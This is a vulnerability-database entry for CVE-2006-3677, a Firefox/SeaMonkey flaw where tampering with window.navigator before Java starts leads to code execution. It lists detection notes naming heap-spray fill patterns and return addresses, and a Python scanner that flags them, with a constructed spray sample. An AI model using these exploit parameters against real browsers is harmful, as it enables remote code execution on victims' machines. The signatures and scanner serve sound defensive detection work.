CVE-2006-3677
published 2006-07-27


Priority: P2 (score 73, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Flags: ITW, EXPLOIT, VulnCheck KEV (exploited in the wild)
EPSS: 78.36% (99.5th percentile)
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.

Affected

10 ranges
Vendor    Product      Version range                        Fixed in
debian    firefox      < firefox 1.5.dfsg+1.5.0.5-1 (sid)   firefox 1.5.dfsg+1.5.0.5-1 (sid)
debian    thunderbird  < firefox 1.5.dfsg+1.5.0.5-1 (sid)   firefox 1.5.dfsg+1.5.0.5-1 (sid)
mozilla   firefox      (5 ranges, versions not listed)      -
mozilla   seamonkey    (3 ranges, versions not listed)      -

Detection & IOCs (extracted from sources)

command: window.navigator.javaEnabled()
  • Exploit triggers by manipulating window.navigator object properties before Java plugin initialisation; detect JavaScript accessing and overwriting window.navigator properties combined with javaEnabled() calls in browser traffic.
  • Exploit delivery is an HTML page served as text/html containing a JavaScript heap-spray loop; look for large unescape() strings with repeated fill patterns (%u0800, %ua8a8, %u0c0c, %u1c1c) in HTTP responses targeting Firefox user-agents.
  • Vulnerability check in Metasploit module tests window.navigator.javaEnabled(); network-level detection can flag HTML pages that both call javaEnabled() and perform heap spray with unescape() fill patterns.
  • Win32 heap-spray return address 0x08000800 and fill pattern %u0800 are static across all known exploit variants; signature on these values in JavaScript can identify the Windows-targeted payload.
  • Linux heap-spray uses fill pattern %ua8a8 and integer-wrapped return address 0xa8000000 (-0x58000000); signature on %ua8a8 repeated heap spray identifies the Linux-targeted payload.
  • Exploit requires the Java plugin to be installed and enabled in the browser; without Java the vulnerability cannot be triggered.
  • Affected versions are Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 only; later versions are not vulnerable.
  • The Linux shellcode payload (touch /tmp/METASPLOIT) is noted as unreliable in the original PoC.
  • Metasploit module payload space is limited to 512 bytes with no bad characters, constraining usable shellcode.
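The indicators in the notes above (javaEnabled() probe, navigator property overwrite, unescape() heap-spray fills and the static return addresses) turned into a small response-body scanner. This is an added example, not code from the page's sources; the sample HTML bodies are constructed, and the MIN_REPEAT threshold is an assumption.

```python
import re
from collections import Counter

# Indicators from the detection notes for CVE-2006-3677: a javaEnabled() probe,
# overwrites of window.navigator properties, unescape() heap-spray fills and
# the return addresses reported as static across known exploit variants.
JAVA_ENABLED_RE = re.compile(r"(?:window\.)?navigator\.javaEnabled\s*\(\s*\)")
NAVIGATOR_WRITE_RE = re.compile(r"(?:window\.)?navigator\.\w+\s*=[^=]")
UNESCAPE_RE = re.compile(r"unescape\s*\(\s*['\"]((?:%u[0-9a-fA-F]{4})+)['\"]\s*\)")
RETADDR_RE = re.compile(r"0x08000800|0xa8000000|-0x58000000")
KNOWN_FILL = {"0800": "win32", "a8a8": "linux", "0c0c": "generic", "1c1c": "generic"}
MIN_REPEAT = 8  # assumption: fewer repeats of one unit is not treated as a spray


def heap_spray_fills(body):
    """Return (fill, repeat_count, target) for each unescape() literal dominated by a known fill."""
    hits = []
    for m in UNESCAPE_RE.finditer(body):
        units = re.findall(r"%u([0-9a-fA-F]{4})", m.group(1))
        unit, count = Counter(u.lower() for u in units).most_common(1)[0]
        if unit in KNOWN_FILL and count >= MIN_REPEAT:
            hits.append((unit, count, KNOWN_FILL[unit]))
    return hits


def assess(body):
    """Classify an HTML/JS response body as 'clean', 'low' (weak hint only) or 'suspicious'."""
    findings = []
    if JAVA_ENABLED_RE.search(body):
        findings.append("javaEnabled() probe")
    if NAVIGATOR_WRITE_RE.search(body):
        findings.append("navigator property overwrite")
    for fill, count, target in heap_spray_fills(body):
        findings.append(f"heap-spray fill %u{fill} x{count} ({target})")
    if RETADDR_RE.search(body):
        findings.append("known spray return address")
    spray = any(f.startswith("heap-spray") for f in findings)
    # javaEnabled() alone is routine feature detection; only flag it together with a spray.
    if spray and "javaEnabled() probe" in findings:
        return "suspicious", findings
    return ("low" if findings else "clean"), findings


# Constructed samples (not real exploit traffic): the filler repeats %u0800,
# the "shellcode" literal is a NOP-only placeholder.
SUSPICIOUS = (
    '<script>var fill = unescape("' + "%u0800" * 16 + '");'
    'var sc = unescape("%u9090%u9090");'
    "window.navigator.javaEnabled = function () { return true; };"
    "if (window.navigator.javaEnabled()) { spray(fill, sc); }</script>"
)
BENIGN = '<script>if (navigator.javaEnabled()) { document.write("java ok"); }</script>'
```

Real exploit pages often build the fill string with a doubling loop rather than one long literal, so a production rule should also match short %u literals followed by self-concatenation.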

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck               7.5    HIGH
vendor_debian           7.5    HIGH
vendor_redhat           7.5    HIGH
vendor_ubuntu           7.5    HIGH